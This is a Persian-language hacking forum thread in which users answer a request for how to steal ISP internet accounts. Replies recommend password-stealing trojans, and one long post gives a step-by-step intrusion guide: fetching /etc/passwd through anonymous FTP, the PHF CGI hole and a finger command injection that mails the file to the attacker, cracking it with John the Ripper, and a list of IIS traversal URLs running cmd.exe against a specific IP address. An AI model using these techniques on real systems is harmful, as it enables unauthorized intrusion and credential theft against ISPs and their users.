account hacking

salam
beyne dostan kasi hast ke dar morede hack kardane accounte internet etelaati dashte bashe ya khodesh kar karde bashe dar in zamine?
mamnoon misham age mitone tozih bede rajebe in matlab
 

Ali_ix

Well-Known Member
سلام

علي رضا جان ميتوني از انواع تروجانها براي اين كار استفاده كني...

هم از تروجانهايي مثل Sub7 كه سيستمش Client/server هست ...

هم با تروجانهاي EPS=email password sender كه فقط يه سرور براي طرف فرستاده ميشه و اطلاعات براي شما ميل ميشه... :wink: مثل K2PS

البته انتخاب نوع تروجان به سيستم عامل قرباني و بقيه شرايط سيستمش بستگي داره ... :roll:

اينارو اگه بشه سر فرصت توضيح ميدم....

موفق باشيد ..

علي. 8)
 

Ali_ix

Well-Known Member
سلام

علي رضا جان براي شما چه فرقي ميكنه ؟ :?:

حالا شما فرض كن كه آره :wink: حالا چي ؟ چي ميخواي ؟ :roll:

نكنه ميخواي منو دستگير كني .. :eek: :idea: :!: :wink:

موفق باشي ...

علي. 8)
 
ali jan salam az mast
agha ma ki bashim shoma ro begirim
hackerha va makhsosan CRACKER haye aziz roo sare bande ja daran
manzoor az soalam in bood ke bebinam shoma tajrobeye amamito age dari dar ekhtiyare alaghemandan :wink: ghara bedi
chon hamishe ke az roo ye seri osool va ghaedeye koli nemishe be hadaf resid
ye seri chiza too tajrobe bedast miyad
mikhastam shoma bejoz neshon dadane rah yekam az tajrobiyate amalit :wink: sohbat koni
shoma ham moafagh bashi
 

xnux

Member
سلام عمو جون

ببين پسرم اولا جون هركي ميپرستي فارسي بنويس
من چشمام نميتونه پينگليش بخونه ( بجاي دقوز آبادي را ميتونم بوخونم )

مورد دوم اينه كه حالا بر فرض كسي هم بلد باشه اين مشكل شما را حل كنه

آخه براي چي بياد اين كار را بكنه
انگيزش چيه ؟
چي بدست مياره
چرا خودش را لو بده
چرا حق خوري كنه

( شدم پدر مقدس ... نه ؟ 8O )

------------------------------------------------
سوالت خيلي خاصه
من نميدونم ولي فكر نميكنم كسي باشه راحت بياد و همينجا جوابت را بده
منظورم جوابيه كه خيلي كار درست باشه ... نه تروجان و اين مزه ها

حالا خودداني
بنظر من برو تو سايتهاي هك خارجي ، شايد به هدفت رسيدي ؟!~

آخه ما ايراني جماعت ها ، فكر ميكنيم خيلي حاليمونه ... برا همين برا همديگه
كلاس ميزاريم و اطلاعات به هم نميديم . بعد هم ميگيم ما بچه مثبتيم و ما اينكاره باز نيستيم ها
و خلاصه از اين مزه ها


----------------------------------------------
نميدونم ميگيري من چي ميگم يا نه ؟
حداقلش من كه يه مقدار اينطوريم ... بقيه را نميدونم :wink:

يه چيز ديگه را هم بهت بگم ...
مزد آن گرفت جان برادر كه كار كرد
خودت را معطل كسي نكن
مرد آن است كه خود بخواهد ، نه آنكه قيافشو بگيرد ( چي گفتم :roll: )



بهرحال اينم براي خودش حرفيه
از من گفتن بود ....
اينو از كسي شنيدي كه يه عمري را صرف اين كارهاي بيهوده كرد و آخرش
شد يه آچار فرانسه كه همه كاري حاليشه و هيچ كاري بارش نيست :lol:


در ضمن من مخلص شوما هم هستم
:ورزش:
 
جناب مدير سلام
فرموده بودين فارسي بنويسم چشم اينم فارسي :wink:
حر فتو قبول دارم ولي فكر نميكني بعضي وقتا بهتر باشه ادم از تجربه ديگران استفاده كنه كه
ضرر نكنه؟؟
حالا اگه تو ايران كسي زياد تو اين موودا نيس يا به قول شما كلاس ميذاره فرصت بيشتر ياد گرفتن رو از خودش ميگيره و ضرر ميكنه چون تو هر زمينه دست بالاي دست زياده( معلم ادبيات شدم :wink: )
من هم رو همين اصل تصميمم اين بوده و هست كه موضوع يا سوالي كه به نظرم جالب مياد رو اينجا مطرح كنم,اگه كسي از دوستا جواب داد كه لطف كرده اگرم نه كه بازم لطف كرده :wink:


موفق باشي داداچ :wink: :ورزش:
 

xnux

Member
اولا به من نگو مدير ، آخه من از اين عنوان زياد نميخوام استفاده كنم
بهتره همون چيزي كه بچه ها بهم ميگند را بگي : عمو XnuX يا عمو جون

( به خودم : بابا كلاس ... بابا اقتدار ملي .... بابا عظمت .... بابا هيبت :roll: )

اما ادامه مبحث

در پاسخ به شما بايد بگم كه البته !!!
حرف شما را قبول دارم و اين نكته را متذكر ميشوم كه در اين برهه زماني اطلاعات
علمي و دانش بيشتر كاربران اينترنتي ايراني بسيار بالاتر رفته و از ميان اونها متخصصين
زيادي سر در آورده اند كه جاي نبريك و اميدواري دارد .

اما شما فكر نميكنم بدوني
شايد 10 سال پيش كه من كار با رايانه را شروع كردم و حدود 6 سال پيش كه
با شبكه و مفهوم اون آشنا شدم ، كسي نبود كه اطلاعات علمي زيادي در اين
موارد داشته باشد و حتي آنهايي كه اين اطلاعات را داشتند هم آنقدر كلاس
ميزاشتند كه نگو و نپرس .... ! ( حداقل با اونهايي كه من باهاشون ارتباط داشتم
اينطوري بود )


بله
من زماني علاقه به علم كاميوتر را شروع كردم كه آدمهاي زيادي كه داراي
اطلاعات فني بالا باشند و بتونند منو تغذيه اطلاعاتي بكنند يافت نميشد .
براي همين من هم دست و آستين را بالازدم و خودم افسار اين علاقه خودم را
بدست گرفتم و پيش روندم يا به عبارتي تاختم .

ببين رفيق ... نميخوام بگم كه الان خداي كامپيوترم ، بلكه ميخوام بگم
من دارم به شما روشي را ياد ميدم كه زياد خودت را متكي به ديگرون
نكني و اون موقع است كه از اون چيزي كه ياد ميگيري لذت ميبري و
اون مطلب ملكه ذهن شما خواهد شد .

البته اين روش يه اشكال بزرگ هم داره كه وقتي يه عده به دامش افتادند
خيلي سخت ميشه از چنگش رها شد و اون اشكال هم اينه كه آدم به اون
چيزي كه ياد ميگيره متكي ميشه و سر انجام مغرور
و اونوقته كه ديگه غرور نميزاره آدم پيشرفت كنه و هميشه اين حس
را به آدم ميده كه خيلي حاليشه و نبايد به ديگرون چيزي مفتي ياد بده .

آره رفيق
اين چيزيه كه بعد عمري كه تو كار اين زهرماري باحال ( علم رايانه ) بودم
فهميدم و تجربه هم كردم . از اين حالت هم بيرون اومدن سخته . واقعا
سخته ..... ميدوني چرا ... چون دلت ميسوزه اطلاعاتي را كه با خون دل
بدست آوردي ، مفت و مفت يه لقمه كني و بزاري تو دهن يكي كه تشنه
اين اطلاعاته ....


ببين رفيق
البته اين كار هم كه بخواي لقمه را راحت تو دهن يكي هم بزاري اشتباست
ولي يه راه حل داره ... بايداون فرد را راهنمايي كه تا يه مقدار از مسير را بره
و بعد يجوري و به صورت غير مستقيم اون اطلاعات را بهش داد .

البته اينطوري ممكنه فرد از دست شما ناراحت بشه
ولي حداقلش اينه كه فرد ميفهمه اين اطلاعات همينوطوري
و مفتي مفتي هم به دست نمياد و بايد براي اون زحمت كشيد .
حتي بوده دوستايي كه با اين روش فكر كردن من چقدر كلاس ميزارم
ولي وقتي رسيدن به هدفشون اومدن و ازم تشكر كردند كه اينوطوري
راهنماييشون كردم .

( وووووااااااي .... ديگه شدم استاد اخلاق در علم رايانه :wink: )

تبليغات بازرگاني :

بشتابيد
علاقه مندان بشتابيد
ما براي شما برنامه داريم
درس اخلاق در علم رايانه
قبولي 100 درصد در كنكور اين درس
بشتابيد




Alireza_Cracker گفت:
جناب مدير سلام
فرموده بودين فارسي بنويسم چشم اينم فارسي :wink:
حر فتو قبول دارم ولي فكر نميكني بعضي وقتا بهتر باشه ادم از تجربه ديگران استفاده كنه كه
ضرر نكنه؟؟
حالا اگه تو ايران كسي زياد تو اين موودا نيس يا به قول شما كلاس ميذاره فرصت بيشتر ياد گرفتن رو از خودش ميگيره و ضرر ميكنه چون تو هر زمينه دست بالاي دست زياده( معلم ادبيات شدم :wink: )
من هم رو همين اصل تصميمم اين بوده و هست كه موضوع يا سوالي كه به نظرم جالب مياد رو اينجا مطرح كنم,اگه كسي از دوستا جواب داد كه لطف كرده اگرم نه كه بازم لطف كرده :wink:


موفق باشي داداچ :wink: :ورزش:
 

Ali_ix

Well-Known Member
سلام

آقا من ديروز هم به اين تاپيك سر زدم و خوندم پيامهارو ...ولي نميدونم چرا نتونستم هيچ جوابي بدم ...يعني نميدونستم چي ميخوام بگم..... :cry:

ولي الان كه عمو اومد و اينهمه درس اخلاق داد !! تازه فهميدم كه چي ميخواستم بگم ... :wink:

آقا ما كه هيچي نيستيمو و هنوز جوجه ايم :wink: ولي نظرم با عمو جون يكيه ... يعني من حرفشو كاملا تاييد ميكنم ...

من كه چيز زيادي حاليم نيست ...ولي از اون دسته آدما كه دوست ندارن به قول عمو حاصل دسترنج و تجربه خودشونو به كسي بدن نيستم !!(يا حداقل خودم فكر ميكنم كه نيستم ! :roll: )

دوست دارم هر چي بلدم به بقيه ياد بدم (البته به كسي كه ازش درست استفاده كنه :wink: )

ولي اينكه آدم بياد يه مبحثو تا اون ريزترين مواردش دقيق توضيح بده يه جورايي تنبل كردن بقيه هست و همونطور كه عمو گفت زياد جالب نيست.... :idea:

من اين مورد و تا حالا زياد تجربه كردم ... درست جواب نميده ...يعني طرف كليشه اي و وابسته بار مياد... كه اگه حتي يه مشكل كوچيك براش پيش بياد نميتونه حل كنه ... :!:

ببخشيد زياد حرف زدمو سرتونو درد آوردم ... :oops:

موفق و پيروز و شاد باشيد ...

علي. 8)
 
سلام به همه دوستاي خوبم
و سلام مخصوص به علي اقاي كنكوري و عموي نصف جهوني :wink:

اقا عجب بساطي شدا!
علي اقاي گل . داداچ من لقمه گذاشتن تو دهن بقيه و بعد قورت دادنش تو خون هيچ
cracker ي از جمله بنده نيس

هدف فقط و فقط استفاده از يه سري تجربياته همين!

بقيه حرفا باشه باسه بعد چون من اصلا تايپ فارسيم خوب نيس و الان هم شبه و پدرم داره
در مياد همين 4 تا خطو ميتايپم :wink: :roll: 8O

تا بعد...
 

xnux

Member
با تشكر از دوستان
كلاس درس اخلاق تموم شد .
خسته باشيد

هفته ديگه امتحان ميگيرم
ديگه اين مباحث تكرار نميشه

ممنونم
بفرماييد زنگ خورده
:roll:
 

ksn

New Member
سلام ! فكر كنم اين تاپيك اون اولا موضوعش اكانت هكينگ بوده :wink:
خوب اين كار n راه داره اما اينو بدون كه سايتها انقدا هم درپيت نيستن كه بشه راحت ازشون اكانت پيچوند و عشق دنيا رو كرد !
من يه چندتا راه رو مي گم كه اگه سعي كني و دنبالشو بگيري حتما يادمي گيري ! ببين براي بدست آوردن يوزرنيم و اكانت هاي يك آي اس پي بايد به هاردسرور اون آي اس ژي متصل بشي !در اين راه احتمالا با مشكلات زيادي برخورد خواهيد كرد .من راه كامل و بي عيبي را در اختيار شما نمي گذارم براي هكر شدن بايد تلاش بسياري كرد و اين اشاره اي است كه شما را به طرف راه درست هدايت مي كند .براي هك يونيكس از اين طريق عمل مي كنند كه با روش هايي كه ذكر خواهد شد فايل حاوي Passwordها و IDها را كه به نام Passwdمي باشد دريافت كنند .اين فايل يك فايل متني است كه در آن اطلاعات بصورت رمز در آمده .وقتي شكا يك فايل Passwdرا باز كنيد چنين نوشته هايي را مي بينيد .كه بايد آن را از حالت رمز در آورد .
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
KsN:3A62i9qr:1012:10:Mashhad
در اينجا مثلا ksn نام IDو 3a62...كلمه ي عبور اما به صورت رمز در آمده مي باشد .
شايد فايل به شكل زير هم باشد .اما اين فايل كار را غيرممكنمي سازد.در صورتي كه به شكل زير باشد يعني در آن علامت *به جاي كلمه ي به رمز آمده به آن ها Shadowedگفته مي شود .

root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
KsN:*:1012:10:mashhad BFH:/home/user/KsN:/usr/local/bin/tcsh

حالا از اول يكم راحت تر اين روش رو كه حمله از طريق dos هست رو ميگم
بعد از اتصال كامل بايد از آي اس پي تون يه whois بگیرید ! اگه سایت مورد نظرتون برای org , net , com است من www.samspade.org رو پیشنهاد می کنم ! و روششم اینطوری هست :

http://www.samspade.org/t/whois?a=ksn.com

كه بجاي KsN.com آدرس سایت مورد نظرتون رو بنویسید حالا یه صفحه باز میشه که کلی اطلاعات در مورد این سایت نوشته ما با اونا کارنداریم فقط باید دنبال کلمه Domain servers یا بعضی موقه ها اگه اون نبود دنبال DNS Servers می گردیم که یا بالای صفحه هست یا پایین !
حالا وارد قسمت Command Prompt بشيد كه همون داس خودمونه تایپ کنید !
FTP http://www.domain.com
كه Domainآدرس سرور ISP هستش که اون بالا توضیح دادم بعد از شما خواسته مي شه تا آيدي خودتونو وارد كنيد كلمه ي Anonymousرا بزنيد وقتي درخواست كلمه عبور شد كليد Enterرا بزن .اگر وارد سيستم شدي موفق شده اي در غير اين صورت جمله ي login failedدريافت مي شه . خوب پس این دفعه Password رو آدرس یه Emailاي را وارد كن .اگر اين بار هم جواب نداد اين دفعه روش هاي زیر رو امتحان کن :

FTP ftp.domain.com

خلاصه تمام تلاش خودتو براي فهميدن روش دستيابي به سيستم بكن اگر توانستيد وارد سيستم بشي به راحتي مي تواني وارد شاخه ي مشخصي رفته و فايل Passwdها را بگيري ولي احتمال دارد كه آن شاخه براي شما قفل شده باشد .براي كار با FTPبايد دستورات FTPرا بلد باشی براي اینکه دستورات رو ببینید ? رو تايپ كنيد . حالا به شاخه ي ETCبرو مي تواني فايل passwdرا در آنجا پيدا كني .اين فايل را بگير .اگر تو اونجا نبود شاخه هاي ديگه رو امتحان کن . ولي به احتمال زياد همونجاست .حال اگر اصلا نتوانستيد وارد FTPشويد مي توانيد اين فايل را با استفاده از قايلبيت PHFبگيريد .به اين صورت كه در Internet Browserخود آدرس زير را وارد كن .

http://www.domain.com/cgi-bin/phf?Q...t /etc/passwd

اگر به اين صورت هم نتوانستيد آن را بگيريد مي توانيد از طريق Fingerاين كار را انجام بده .اين روش به شرطي جواب مي دهد كه Serverمورد نظر قابليت Fingerرا داشته باشد .به آدرس زير مراجعه كن .

www.domain.com/cgi-bin/finger

اگر اين آدرس كار كنه كادري جلوت ظاهر مي شه كه ازت می خواد نام مورد نظر خود را وارد کنی آدرس زير را وارد كنيد .

[email protected] ; /bin/mail [email protected] < etc/passwd

كه در اين آدرس IDشناسه كاربري يك شخص است كه مثلا مي توانيد از آيدي دوستتان استفاده كنيد domain.comآدرس نام حوزه ي ISPاست و آدرس [email protected]آدرس Emailشماست مثلا اين يك نمونه است .

[email protected] ; /bin/mail [email protected] < etc/passwd

با وارد كردن اين دستور فايل Passwdبراي من به آدرس [email protected]
پست مي شi !

خوب حالا تا الان اگر توانسته ايد فايل را گرفته باشيد كه بهتر در غير اينصورت بايد بي خيال اين روش بشي .
حالا اگر يه فايل مثل نمونه ي اولي كه در بالا بود گير آوردي مي تواني كار خود را ادامه بدي حالا شما نياز به يك برنامه ي Unix Password Crackerداريد معروف ترين اين نوع برنامه ها John Ripperو Cracker Jack هستش .اما John Ripper سريعترين نوع اين برنامه مي باشد .اين دو برنامه را مي توانيد از همان آدرس قبلي يعني www.hackersclub.com/km/frontpageبه دست بياوري ! اين روشهاي بالايي ماله سيستم هاي يونيكس هست كه الان تقريبا هفتاد درصد از يونيكس استفاده مي كنند !

روش بعدي استفاده از اسكريپت ها هست كه صد در صد عملي هست اما يكم مشكل هست !
تو اين روش شما بايد روش exploit و نوشتن اسكريبتها رو بلد باشيو بدون هيچ تروجان بك دوري مي توني وارد هارد سرور بشي !
اين روش اينطوري هست كه بعد از بدست آوردن سرور بايد آي پي سرور رو هم بدست بياري براي بدست آوردن آي پي سرور از فرمان nslookup تو داس استفاده مي كنيم !
C:\>nslookup
كه بعد از تايژ اين فرمان يه چيزايي مياد و آخرين سطر يه علامت < هست كه شما بايد جلوي اون آدرس سرور رو بنويسيد مثلا :
server s1.ksn.com<
كه جواب ميشنويم
Default Server: s1.ksn.com
Address: 194.165.8.60
حالا بايد بانوشتن اسكريبت ها وارد هارد سرور بشيم !
من در مورد نوشتن اسكريپت ها چيزي نمي گم چون كه با يه كي دو خط نمي شه چيزي فهميد !
شما بعد از نوشتن اسكريپت مي تونيد به شكل زير ازش استفاده كني !
http://serverip/script
كه به جاي serverip آي پي سرور بدست اومده رو مي نويسيم و به جاي script هم اون اسكريژتي كه نوشتيم حالا خيلي راحت وارد هارد سرور مي شي ! من نا اميدت نمي كنم امتحان كن يه نرم افزار برات معرفي مي كنم كه اين اسكريپت هارو سرچ مي كنه ! اما كامل نيست و زياد نميشه بهش تكيه كرد از این http://www.astalavistalab.com/files/cgis4.zip آدرس دانلود کنید اسمشم CGI Scanner هست !
روش كارشم اينه كه آدرس آي پي سرور رو تو قسمت و Url مينويسي و از منوي rule set گزینه scan all رو تایپ می کنی ! البنه می تونی مستقیما آدرس سایت رو تو قسمت Url بنویسی اما درصد خطا خیلی زیاد می شه ! من یه چند تا اسکرپت رایج رو برات می گم ! البته برای هر سرور یه اسکریپت جواب میده :


HTTP://194.165.8.60/scripts/..%5c../..%5c../..%5cwinnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%5c../winnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%5c../..%5c../..%5cwinnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%5c../winnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%5c../..%5c../..%5cwinnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%5c../winnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%5c../..%5c../..%5cwinnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%5c../..%5c../..%5cwinnt/system32/cmd.exe?/c+dir
HTTP://194.165.8.60/scripts/..%5c../winnt/system32/cmd.exe?/c+dir
TTP://194.165.8.60/scripts/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c%20dir%20C:\
HTTP://194.165.8.60/scripts/..%u00255c../..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir

راه های دیگه ای هم هستن مثل تروجانهای بک دور و ... اما هم مشکل ترن هم اینکه به خاطر فایروال ها و ... دیر و خیلی سخت به نتیجه می شه رسید ! من که نه اطلاعاتی دارم نه چیزی ولی اینارو گفتم که به xnux عزیز بگم اینطور نیست که کسی دوست نداشته باشه دیگران از اطلاعاتش استفاده کنن بلکه مشکل اینجاست که کسی حوصله دردسر تراشی برای خودش نداره ! + موفق باشید ! :wink:
 

KaMArikaN

New Member
كماريكان

سلام عزيز ججان . ببين قربون شكلت اصولا چيزي كه تو مي خواي 1 راه بيشتر نداره اول از همه يه ويندوز يا لينوكس يا يونيكس ه يرور نصب كن تو مرحله بعدي يه نرم افزاره مديريته اكانتينگ رو سيستمت نصب كن بعد وقتي آنلاين شدي به اون برنامه برگرد و خودت رو reseller كن البته اين فقط در يك شرط كار ميكنه كه برنامه اكانتينگي كه نصب مي كني رو isp يي كه ميحواي اكانتش رو هك كني بخوره و از همون استفاده كنن .
مطمپن باش 100٪ جواب مي گيري
اينم واسه اين گفتم كه بدونيد تو ايران هم كسي هست كه اين چيزا رو به كسي بگه
البته اين يه راه 100٪ و راخت ديگه هم داره كه اكثر كاربران لينوكس مثل من مي دونن ولي اون راه رو مي فروشم :idea: اگه خواستي بيا تو وبلاگم و پيغام بزار
آدرسه بلاگه من
http://kamarikan.persianblog.com
خب ديگه فعلا باي
 

جدیدترین ارسال ها

بالا